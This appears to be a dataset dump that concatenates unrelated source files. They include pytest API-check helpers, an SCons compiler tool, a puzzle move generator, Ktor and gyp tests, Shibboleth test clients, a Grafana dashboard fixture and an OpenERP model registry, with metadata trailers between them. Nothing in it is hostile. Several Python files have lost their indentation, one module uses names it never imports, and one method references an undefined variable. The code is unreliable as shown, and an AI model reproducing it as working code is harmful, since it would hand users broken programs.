import sys
import tempfile
import pytest
from six import string_types
from .api import INTERNAL, PUBLIC
from .api import is_declared, is_level, is_version
def verify_all(module, ALL):
class Test___all__(object):
def test___all__(self):
if isinstance(module, string_types):
mod = importlib.import_module(module)
else:
mod = module
assert hasattr(mod, "__all__")
assert mod.__all__ == ALL
@pytest.mark.parametrize('name', ALL)
def test_contents(self, name):
if isinstance(module, string_types):
mod = importlib.import_module(module)
else:
mod = module
assert hasattr(mod, name)
return Test___all__
def verify_api(module, api):
class Test_api(object):
test_public_api = _generate_api_check(module, api, PUBLIC)
test_internal_api = _generate_api_check(module, api, INTERNAL)
@pytest.mark.api
def test_all_declared(self):
to_check = []
for name, obj in getmembers(module):
# only test objects defined in this module
if getattr(obj, '__module__', None) != module.__name__: continue
# pure private objects are not versioned
if name.startswith('_'): continue
to_check.append((name, obj))
if isclass(obj):
for cname, cobj in getmembers(obj):
# pure private methods are not versioned
if cname.startswith('_'): continue
to_check.append((name + "." + cname, cobj))
for (name, obj) in to_check:
if isfunction(obj):
assert is_declared(obj), "visible function %r is not API declared" % name
elif isclass(obj):
assert is_declared(obj), "visible class %r is not API declared" % name
elif isinstance(obj, property):
assert is_declared(obj.fget), "visible Python property getter %r is not API declared" % name
if obj.fdel is not None:
assert is_declared(obj.fset), "visible Python property getter %r is not API declared" % name
if obj.fdel is not None:
assert is_declared(obj.fdel), "visible Python property getter %r is not API declared" % name
@pytest.mark.api
def test_all_tested(self):
for level in (INTERNAL, PUBLIC):
recorded = module.__bkapi__[level]
assert len(api[level]) == recorded, "expected %d tests for %s API objects in %s, got %d" % (recorded, level, module.__name__, len(api[level]))
return Test_api
def _generate_api_check(module, api, level):
if len(api[level]) > 0:
@pytest.mark.parametrize('name,version', api[level], ids=str)
@pytest.mark.api
def test_api(self, name, version):
assert isinstance(version, tuple)
assert len(version) == 3
assert version >= (1, 0, 0)
elts = name.split(".")
# property
if len(elts) == 3:
(clsname, propname, proptype) = elts
prop = getattr(module, clsname).__dict__[propname]
obj = getattr(prop, proptype)
# method
elif len(elts) == 2:
(clsname, attr) = elts
obj = getattr(getattr(module, clsname), attr)
# function
else:
obj = getattr(module, name)
assert is_level(obj, level), "%s expected to declare api level %r" % (name, level)
assert is_version(obj, version), "%s expected to declare first-version %s" % (name, version)
else:
@pytest.mark.api
def test_api(self): assert True
return test_api
def makedirs_ok_if_exists(path):
try:
os.makedirs(path)
except IOError as e: # pragma: no cover (py3 only)
if e.errno != errno.EEXIST:
raise e
except OSError as e: # pragma: no cover (py2 only)
if e.errno != errno.EEXIST:
raise e
return path
local_tmp = os.path.abspath("./build/tmp")
makedirs_ok_if_exists(local_tmp)
class WorkingDir(object):
def __init__(self, pwd):
self._new = pwd
self._old = os.getcwd()
def __exit__(self, type, value, traceback):
os.chdir(self._old)
def __enter__(self):
os.chdir(self._new)
return self._new
class TmpDir(object):
def __init__(self, prefix):
self._dir = tempfile.mkdtemp(prefix=prefix, dir=local_tmp)
def __exit__(self, type, value, traceback):
try:
shutil.rmtree(path=self._dir)
except Exception as e:
# prefer original exception to rmtree exception
if value is None:
print("Exception cleaning up TmpDir %s: %s" % (self._dir, str(e)), file=sys.stderr)
raise e
else:
print("Failed to clean up TmpDir %s: %s" % (self._dir, str(e)), file=sys.stderr)
raise value
def __enter__(self):
return self._dir
def with_temporary_file(func, dir=None):
if dir is None:
dir = local_tmp
import tempfile
# Windows throws a permission denied if we use delete=True for
# auto-delete, and then try to open the file again ourselves
# with f.name. So we manually delete in the finally block
# below.
f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
try:
func(f)
finally:
f.close()
os.remove(f.name)
def with_directory_contents(contents, func):
with (TmpDir(prefix="test-")) as dirname:
for filename, file_content in contents.items():
path = os.path.join(dirname, filename)
if file_content is None:
# make a directory
makedirs_ok_if_exists(path)
else:
makedirs_ok_if_exists(os.path.dirname(path))
with codecs.open(path, 'w', 'utf-8') as f:
f.write(file_content)
return func(os.path.realpath(dirname))
def with_file_contents(contents, func, dir=None):
def with_file_object(f):
f.write(contents.encode("UTF-8"))
f.flush()
# Windows will get mad if we try to rename it without closing,
# and some users of with_file_contents want to rename it.
f.close()
func(f.name)
with_temporary_file(with_file_object, dir=dir)
def skipIfPy3(message):
''' unittest decorator to skip a test for Python 3
'''
from unittest import skipIf
from .platform import is_py3
return skipIf(is_py3(), message) | unknown | codeparrot/codeparrot-clean | ||
"""SCons.Tool.aixc++
Tool-specific initialization for IBM xlC / Visual Age C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixc++.py 2009/09/04 16:33:07 david"
import os.path
import SCons.Platform.aix
cplusplus = __import__('c++', globals(), locals(), [])
packages = ['vacpp.cmp.core', 'vacpp.cmp.batch', 'vacpp.cmp.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CXX', 'xlC')
xlc_r = env.get('SHCXX', 'xlC_r')
return SCons.Platform.aix.get_xlc(env, xlc, xlc_r, packages)
def smart_cxxflags(source, target, env, for_signature):
build_dir = env.GetBuildPath()
if build_dir:
return '-qtempinc=' + os.path.join(build_dir, 'tempinc')
return ''
def generate(env):
"""Add Builders and construction variables for xlC / Visual Age
suite to an Environment."""
path, _cxx, _shcxx, version = get_xlc(env)
if path:
_cxx = os.path.join(path, _cxx)
_shcxx = os.path.join(path, _shcxx)
cplusplus.generate(env)
env['CXX'] = _cxx
env['SHCXX'] = _shcxx
env['CXXVERSION'] = version
env['SHOBJSUFFIX'] = '.pic.o'
def exists(env):
path, _cxx, _shcxx, version = get_xlc(env)
if path and _cxx:
xlc = os.path.join(path, _cxx)
if os.path.exists(xlc):
return xlc
return None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
def _get_number_of_moves(tab):
rows = len(tab)
cols = None
for row in tab:
if cols is None:
cols = len(row)
if cols != len(row):
raise ValueError("la cantidad de columnas de la matriz " +
"debe ser igual en cada fila")
return (rows,cols)
def _move_ij(tab, move, empty):
tab = [list(r) for r in tab]
if move != empty:
i,j = move
nonei, nonej = empty
if i+1 == nonei or i-1 == nonei or j+1 == nonej or j-1 == nonej:
aux = tab[i][j]
tab[i][j] = None
tab[nonei][nonej] = aux
return tab
def _get_empty_cord(tab, empty):
emptys=[]
for idx_i in range(len(tab)):
for idx_j in range(len(tab[idx_i])):
if tab[idx_i][idx_j] == empty:
cord = (idx_i, idx_j)
emptys.append(cord)
return emptys
def _get_all_child(tab, empty = None):
tab = [list(l) for l in tab]
movesi, movesj = _get_number_of_moves(tab)
childs = []
emptys = _get_empty_cord(tab, empty)
for empty in emptys:
for idxi in range(movesi):
for idxj in range(movesj):
move = (idxi, idxj)
new_tab = _move_ij(tab, move, empty)
childs.append(new_tab)
return childs
if __name__ == '__main__':
def print_matrix(matrix, tabs=0):
ttp = [ "\t" for c in range(tabs)]
ttp = "".join(ttp)
for row in matrix:
print(ttp + str(row))
tab = [
[1,2,3],
[8, None, 4],
[7,6,5]
]
tabs = _get_all_child(tab, None)
for t in tabs:
print_matrix(t, 2)
print "" | unknown | codeparrot/codeparrot-clean | ||
# The {{ project_name }} should be rendered. | python | github | https://github.com/django/django | tests/admin_scripts/custom_templates/project_template/.hidden/render.py |
/*
* Copyright 2014-2019 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.tests.http
import io.ktor.http.*
import kotlin.test.*
class ContentTypeMatchTest {
@Test
fun testTypeAndSubtype() {
assertTrue { ContentType.parse("text/plain").match("*") }
assertTrue { ContentType.parse("text/plain").match("* ") }
assertTrue { ContentType.parse("text/plain").match("*/*") }
assertTrue { ContentType.parse("text/plain").match("*/ *") }
assertTrue { ContentType.parse("text/plain").match("*/plain") }
assertTrue { ContentType.parse("text/plain").match("* /plain") }
assertTrue { ContentType.parse("text/PLAIN").match("*/plain") }
assertTrue { ContentType.parse("text/plain").match("text/*") }
assertTrue { ContentType.parse("text/plain").match("text/plain") }
assertTrue { ContentType.parse("text/plain").match("TEXT/plain") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("text/") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("/plain") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("foobar") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("foo/bar/baz") }
assertFalse(ContentType.parse("text/plain").match("image/plain"))
assertFalse(ContentType.parse("text/plain").match("text/xml"))
}
@Test
fun testParametersConstants() {
assertTrue { ContentType.parse("a/b; a=1").match("*/*; a=1") }
assertTrue { ContentType.parse("a/b; A=1").match("*/*; a=1") }
assertFalse(ContentType.parse("a/b").match("*/*; a=2"))
assertFalse(ContentType.parse("a/b; a=1").match("*/*; a=2"))
assertFalse(ContentType.parse("a/b; A=1").match("*/*; a=2"))
}
@Test
fun testParametersWithSubtype() {
assertTrue { ContentType.parse("a/b; a=1").match("a/b") }
assertTrue { ContentType.parse("a/b; a=xyz").match("a/b; a=XYZ") }
}
@Test
fun testParametersValueWildcard() {
assertTrue(ContentType.parse("a/b; a=1").match("*/*; a=*"))
assertFalse(ContentType.parse("a/b; b=1").match("*/*; a=*"))
}
@Test
fun testParametersNameWildcard() {
assertTrue(ContentType.parse("a/b; a=1").match("*/*; *=1"))
assertTrue(ContentType.parse("a/b; a=X").match("*/*; *=x"))
assertFalse(ContentType.parse("a/b; a=2").match("*/*; *=1"))
assertFalse(ContentType.parse("a/b; a=y").match("*/*; *=x"))
}
@Test
fun testParametersAllWildcard() {
assertTrue(ContentType.parse("a/b; a=2").match("*/*; *=*"))
assertTrue(ContentType.parse("a/b").match("*/*; *=*"))
}
@Test
fun testContentTypeConst() {
assertTrue { ContentType.Application.FormUrlEncoded.match(ContentType.Application.FormUrlEncoded) }
assertFalse(ContentType.Application.Json.match(ContentType.Application.FormUrlEncoded))
}
} | kotlin | github | https://github.com/ktorio/ktor | ktor-http/common/test/io/ktor/tests/http/ContentTypeMatchTest.kt |
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from contextlib import contextmanager
import copy
import datetime
import functools
from snf_django.utils.testing import with_settings, override_settings, \
assertIn, assertGreater, assertRaises
from django.test import Client
from django.test import TestCase
from django.core import mail
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.utils.importlib import import_module
from django.utils import simplejson as json
from astakos.im.activation_backends import *
from astakos.im.views.target.shibboleth import Tokens as ShibbolethTokens
from astakos.im.models import *
from astakos.im import functions
from astakos.im import settings as astakos_settings
from astakos.im import forms
from astakos.im import activation_backends
from astakos.im import auth as auth_functions
from urllib import quote
from datetime import timedelta
from astakos.im import messages
from astakos.im import auth_providers
from astakos.im import quotas
from astakos.im import register
from django.conf import settings
# set some common settings
astakos_settings.EMAILCHANGE_ENABLED = True
astakos_settings.RECAPTCHA_ENABLED = False
settings.LOGGING_SETUP['disable_existing_loggers'] = False
# shortcut decorators to override provider settings
# e.g. shibboleth_settings(ENABLED=True) will set
# ASTAKOS_AUTH_PROVIDER_SHIBBOLETH_ENABLED = True in global synnefo settings
prefixes = {'providers': 'AUTH_PROVIDER_',
'shibboleth': 'ASTAKOS_AUTH_PROVIDER_SHIBBOLETH_',
'local': 'ASTAKOS_AUTH_PROVIDER_LOCAL_'}
im_settings = functools.partial(with_settings, astakos_settings)
shibboleth_settings = functools.partial(with_settings,
settings,
prefix=prefixes['shibboleth'])
localauth_settings = functools.partial(with_settings, settings,
prefix=prefixes['local'])
class AstakosTestClient(Client):
pass
class ShibbolethClient(AstakosTestClient):
"""
A shibboleth agnostic client.
"""
VALID_TOKENS = filter(lambda x: not x.startswith("_"),
dir(ShibbolethTokens))
def __init__(self, *args, **kwargs):
self.tokens = kwargs.pop('tokens', {})
super(ShibbolethClient, self).__init__(*args, **kwargs)
def set_tokens(self, **kwargs):
for key, value in kwargs.iteritems():
key = 'SHIB_%s' % key.upper()
if not key in self.VALID_TOKENS:
raise Exception('Invalid shibboleth token')
self.tokens[key] = value
def unset_tokens(self, *keys):
for key in keys:
key = 'SHIB_%s' % param.upper()
if key in self.tokens:
del self.tokens[key]
def reset_tokens(self):
self.tokens = {}
def get_http_token(self, key):
http_header = getattr(ShibbolethTokens, key)
return http_header
def request(self, **request):
"""
Transform valid shibboleth tokens to http headers
"""
for token, value in self.tokens.iteritems():
request[self.get_http_token(token)] = value
for param in request.keys():
key = 'SHIB_%s' % param.upper()
if key in self.VALID_TOKENS:
request[self.get_http_token(key)] = request[param]
del request[param]
return super(ShibbolethClient, self).request(**request)
def get_user_client(username, password="password"):
client = Client()
client.login(username=username, password=password)
return client
def get_local_user(username, **kwargs):
try:
return AstakosUser.objects.get(email=username)
except:
user = auth_functions.make_local_user(email=username,
has_signed_terms=True)
user.set_password(kwargs.pop('password', 'password'))
for key, value in kwargs.iteritems():
setattr(user, key, value)
user.save()
if kwargs.get("is_active", True):
backend = activation_backends.get_backend()
backend.verify_user(user, user.verification_code)
backend.accept_user(user)
return user
def get_mailbox(email):
mails = []
for sent_email in mail.outbox:
for recipient in sent_email.recipients():
if email in recipient:
mails.append(sent_email)
return mails
def reverse_with_next(next_reverse, base_reverse='login'):
return reverse(base_reverse) + '?next=%s' % reverse(next_reverse) | unknown | codeparrot/codeparrot-clean | ||
{
"kind": "Dashboard",
"apiVersion": "dashboard.grafana.app/v2alpha1",
"metadata": {
"name": "v42.hidefrom_tooltip.v42"
},
"spec": {
"annotations": [
{
"kind": "AnnotationQuery",
"spec": {
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"query": {
"kind": "grafana",
"spec": {}
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"builtIn": true,
"legacyOptions": {
"type": "dashboard"
}
}
}
],
"cursorSync": "Off",
"editable": true,
"elements": {
"panel-1": {
"kind": "Panel",
"spec": {
"id": 1,
"title": "Panel with hideFrom.viz = true",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "timeseries",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Field1"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-2": {
"kind": "Panel",
"spec": {
"id": 2,
"title": "Panel with multiple overrides",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "timeseries",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Field2"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
},
{
"__systemRef": "hideSeriesFrom",
"matcher": {
"id": "byNames",
"options": {
"mode": "exclude",
"names": [
"foo"
],
"prefix": "All except:",
"readOnly": true
}
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-4": {
"kind": "Panel",
"spec": {
"id": 4,
"title": "Nested panel with hideFrom",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "stat",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byRegexp",
"options": "/.*/"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-5": {
"kind": "Panel",
"spec": {
"id": 5,
"title": "Panel without hideFrom",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "table",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Time"
},
"properties": [
{
"id": "unit",
"value": "short"
}
]
}
]
}
}
}
}
},
"panel-6": {
"kind": "Panel",
"spec": {
"id": 6,
"title": "Panel with viz false (should not be modified)",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "gauge",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byValue",
"options": {
"op": "gte",
"reducer": "allIsZero",
"value": 0
}
},
"properties": [
{
"id": "unit",
"value": "short"
}
]
}
]
}
}
}
}
},
"panel-7": {
"kind": "Panel",
"spec": {
"id": 7,
"title": "Panel with already set tooltip (should not be modified)",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "barchart",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "{__name__=\"ALERTS\", alertname=\"k6CloudServiceErrorsLogged\"}"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
}
},
"layout": {
"kind": "RowsLayout",
"spec": {
"rows": [
{
"kind": "RowsLayoutRow",
"spec": {
"title": "",
"collapse": true,
"hideHeader": true,
"layout": {
"kind": "GridLayout",
"spec": {
"items": [
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-1"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-2"
}
}
}
]
}
}
}
},
{
"kind": "RowsLayoutRow",
"spec": {
"title": "Row with nested panels",
"collapse": true,
"layout": {
"kind": "GridLayout",
"spec": {
"items": [
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-4"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-5"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-6"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-7"
}
}
}
]
}
}
}
}
]
}
},
"links": [],
"liveNow": false,
"preload": false,
"tags": [],
"timeSettings": {
"timezone": "",
"from": "now-6h",
"to": "now",
"autoRefresh": "",
"autoRefreshIntervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"hideTimepicker": false,
"fiscalYearStartMonth": 0
},
"title": "v42 Migration Test - HideFrom Tooltip",
"variables": []
},
"status": {
"conversion": {
"failed": false,
"storedVersion": "v2beta1"
}
}
} | json | github | https://github.com/grafana/grafana | apps/dashboard/pkg/migration/conversion/testdata/output/migrated_dashboards_from_v0_to_v2/v2beta1.v42.hidefrom_tooltip.v2alpha1.json |
"""
test utils
"""
from nose.plugins.attrib import attr
from lms.djangoapps.ccx.tests.factories import CcxFactory
from student.roles import CourseCcxCoachRole
from student.tests.factories import (
AdminFactory,
)
from xmodule.modulestore.tests.django_utils import (
ModuleStoreTestCase,
TEST_DATA_SPLIT_MODULESTORE)
from xmodule.modulestore.tests.factories import CourseFactory
from ccx_keys.locator import CCXLocator
@attr('shard_1')
class TestGetCCXFromCCXLocator(ModuleStoreTestCase):
"""Verify that get_ccx_from_ccx_locator functions properly"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
def setUp(self):
"""Set up a course, coach, ccx and user"""
super(TestGetCCXFromCCXLocator, self).setUp()
self.course = CourseFactory.create()
coach = self.coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(coach)
def call_fut(self, course_id):
"""call the function under test in this test case"""
from lms.djangoapps.ccx.utils import get_ccx_from_ccx_locator
return get_ccx_from_ccx_locator(course_id)
def test_non_ccx_locator(self):
"""verify that nothing is returned if locator is not a ccx locator
"""
result = self.call_fut(self.course.id)
self.assertEqual(result, None)
def test_ccx_locator(self):
"""verify that the ccx is retuned if using a ccx locator
"""
ccx = CcxFactory(course_id=self.course.id, coach=self.coach)
course_key = CCXLocator.from_course_locator(self.course.id, ccx.id)
result = self.call_fut(course_key)
self.assertEqual(result, ccx) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the easy_xml.py file. """
import gyp.easy_xml as easy_xml
import unittest
import StringIO
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.stderr = StringIO.StringIO()
def test_EasyXml_simple(self):
self.assertEqual(
easy_xml.XmlToString(['test']),
'<?xml version="1.0" encoding="utf-8"?><test/>')
self.assertEqual(
easy_xml.XmlToString(['test'], encoding='Windows-1252'),
'<?xml version="1.0" encoding="Windows-1252"?><test/>')
def test_EasyXml_simple_with_attributes(self):
self.assertEqual(
easy_xml.XmlToString(['test2', {'a': 'value1', 'b': 'value2'}]),
'<?xml version="1.0" encoding="utf-8"?><test2 a="value1" b="value2"/>')
def test_EasyXml_escaping(self):
original = '<test>\'"\r&\nfoo'
converted = '<test>'"
&
foo'
self.assertEqual(
easy_xml.XmlToString(['test3', {'a': original}, original]),
'<?xml version="1.0" encoding="utf-8"?><test3 a="%s">%s</test3>' %
(converted, converted))
def test_EasyXml_pretty(self):
self.assertEqual(
easy_xml.XmlToString(
['test3',
['GrandParent',
['Parent1',
['Child']
],
['Parent2']
]
],
pretty=True),
'<?xml version="1.0" encoding="utf-8"?>\n'
'<test3>\n'
' <GrandParent>\n'
' <Parent1>\n'
' <Child/>\n'
' </Parent1>\n'
' <Parent2/>\n'
' </GrandParent>\n'
'</test3>\n')
def test_EasyXml_complex(self):
# We want to create:
target = (
'<?xml version="1.0" encoding="utf-8"?>'
'<Project>'
'<PropertyGroup Label="Globals">'
'<ProjectGuid>{D2250C20-3A94-4FB9-AF73-11BC5B73884B}</ProjectGuid>'
'<Keyword>Win32Proj</Keyword>'
'<RootNamespace>automated_ui_tests</RootNamespace>'
'</PropertyGroup>'
'<Import Project="$(VCTargetsPath)\\Microsoft.Cpp.props"/>'
'<PropertyGroup '
'Condition="'$(Configuration)|$(Platform)'=='
''Debug|Win32'" Label="Configuration">'
'<ConfigurationType>Application</ConfigurationType>'
'<CharacterSet>Unicode</CharacterSet>'
'</PropertyGroup>'
'</Project>')
xml = easy_xml.XmlToString(
['Project',
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', '{D2250C20-3A94-4FB9-AF73-11BC5B73884B}'],
['Keyword', 'Win32Proj'],
['RootNamespace', 'automated_ui_tests']
],
['Import', {'Project': '$(VCTargetsPath)\\Microsoft.Cpp.props'}],
['PropertyGroup',
{'Condition': "'$(Configuration)|$(Platform)'=='Debug|Win32'",
'Label': 'Configuration'},
['ConfigurationType', 'Application'],
['CharacterSet', 'Unicode']
]
])
self.assertEqual(xml, target)
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Models registries.
"""
from collections import Mapping
from contextlib import contextmanager
import logging
import threading
import openerp
from .. import SUPERUSER_ID
from openerp.tools import assertion_report, lazy_property
_logger = logging.getLogger(__name__)
class Registry(Mapping):
    """ Model registry for a particular database.

    The registry is essentially a mapping between model names and model
    instances. There is one registry instance per database.
    """

    def __init__(self, db_name):
        # Build an (initially empty) registry bound to `db_name` and probe
        # the database once for the optional unaccent() helper.
        super(Registry, self).__init__()
        self.models = {}    # model name/model instance mapping
        self._sql_error = {}
        self._store_function = {}
        self._pure_function_fields = {}     # {model: [field, ...], ...}
        self._init = True
        self._init_parent = {}
        self._assertion_report = assertion_report.assertion_report()
        self.fields_by_model = None

        # modules fully loaded (maintained during init phase by `loading` module)
        self._init_modules = set()

        self.db_name = db_name
        self._db = openerp.sql_db.db_connect(db_name)

        # special cursor for test mode; None means "normal" mode
        self.test_cr = None

        # Indicates that the registry is fully loaded (set by
        # RegistryManager.new() once load_modules() has completed).
        self.ready = False

        # Inter-process signaling (used only when openerp.multi_process is True):
        # The `base_registry_signaling` sequence indicates the whole registry
        # must be reloaded.
        # The `base_cache_signaling sequence` indicates all caches must be
        # invalidated (i.e. cleared).
        self.base_registry_signaling_sequence = None
        self.base_cache_signaling_sequence = None

        # Flag indicating if at least one model cache has been cleared.
        # Useful only in a multi-process context.
        self._any_cache_cleared = False

        cr = self.cursor()
        has_unaccent = openerp.modules.db.has_unaccent(cr)
        if openerp.tools.config['unaccent'] and not has_unaccent:
            _logger.warning("The option --unaccent was given but no unaccent() function was found in database.")
        self.has_unaccent = openerp.tools.config['unaccent'] and has_unaccent
        cr.close()

    #
    # Mapping abstract methods implementation
    # => mixin provides methods keys, items, values, get, __eq__, and __ne__
    #
    def __len__(self):
        """ Return the size of the registry. """
        return len(self.models)

    def __iter__(self):
        """ Return an iterator over all model names. """
        return iter(self.models)

    def __getitem__(self, model_name):
        """ Return the model with the given name or raise KeyError if it doesn't exist."""
        return self.models[model_name]

    def __call__(self, model_name):
        """ Same as ``self[model_name]``. """
        return self.models[model_name]

    @lazy_property
    def pure_function_fields(self):
        """ Return the list of pure function fields (field objects) """
        fields = []
        for mname, fnames in self._pure_function_fields.iteritems():
            model_fields = self[mname]._fields
            for fname in fnames:
                fields.append(model_fields[fname])
        return fields

    def do_parent_store(self, cr):
        """ Compute the parent-store columns of every model registered in
        ``_init_parent``, then leave the init phase. """
        for o in self._init_parent:
            self.get(o)._parent_store_compute(cr)
        self._init = False

    def obj_list(self):
        """ Return the list of model names in this registry."""
        return self.keys()

    def add(self, model_name, model):
        """ Add or replace a model in the registry."""
        self.models[model_name] = model

    def load(self, cr, module):
        """ Load a given module in the registry.

        At the Python level, the modules are already loaded, but not yet on a
        per-registry level. This method populates a registry with the given
        modules, i.e. it instanciates all the classes of a the given module
        and registers them in the registry.

        :returns: the list of model instances loaded for this module,
                  in declaration order.
        """
        from .. import models

        models_to_load = [] # need to preserve loading order
        lazy_property.reset_all(self)

        # Instantiate registered classes (via the MetaModel automatic discovery
        # or via explicit constructor call), and add them to the pool.
        for cls in models.MetaModel.module_to_models.get(module.name, []):
            # models register themselves in self.models
            model = cls._build_model(self, cr)
            if model._name not in models_to_load:
                # avoid double-loading models whose declaration is split
                models_to_load.append(model._name)

        return [self.models[m] for m in models_to_load]

    def setup_models(self, cr):
        """ Complete the setup of models.
            This must be called after loading modules and before using the ORM.
        """
        # prepare the setup on all models
        for model in self.models.itervalues():
            model._prepare_setup_fields(cr, SUPERUSER_ID)

        # do the actual setup from a clean state
        self._m2m = {}
        for model in self.models.itervalues():
            model._setup_fields(cr, SUPERUSER_ID)

    def clear_caches(self):
        """ Clear the caches
        This clears the caches associated to methods decorated with
        ``tools.ormcache`` or ``tools.ormcache_multi`` for all the models.
        """
        for model in self.models.itervalues():
            model.clear_caches()
